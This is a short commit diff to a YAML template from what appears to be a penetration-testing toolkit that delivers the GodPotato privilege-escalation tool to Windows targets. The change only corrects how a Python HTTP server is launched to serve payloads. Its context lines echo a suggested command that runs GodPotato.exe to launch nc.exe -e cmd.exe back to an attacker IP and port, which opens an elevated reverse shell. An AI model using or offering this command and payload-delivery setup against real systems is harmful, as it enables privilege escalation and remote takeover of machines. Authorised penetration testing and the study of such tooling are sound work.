fix: applied suggestion to fix python call

--- a/src/profi/templates/scripts/deliver-windows-GodPotato.yaml
+++ b/src/profi/templates/scripts/deliver-windows-GodPotato.yaml
@@ -15,4 +15,4 @@ content: |
   echo '                      -Suggested Commands-                      '; \
   echo 'To open another revshell with elevated privileges: <%=$(esh variables/delivery_path_windows)%>\GodPotato.exe -cmd "<%=$(esh variables/delivery_path_windows)%>\nc.exe -e cmd.exe <%=$(esh variables/attacker_ip)%> <%=$(esh variables/shell_port)%>"'; \
   echo '================================================================'; \
-  python -m <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
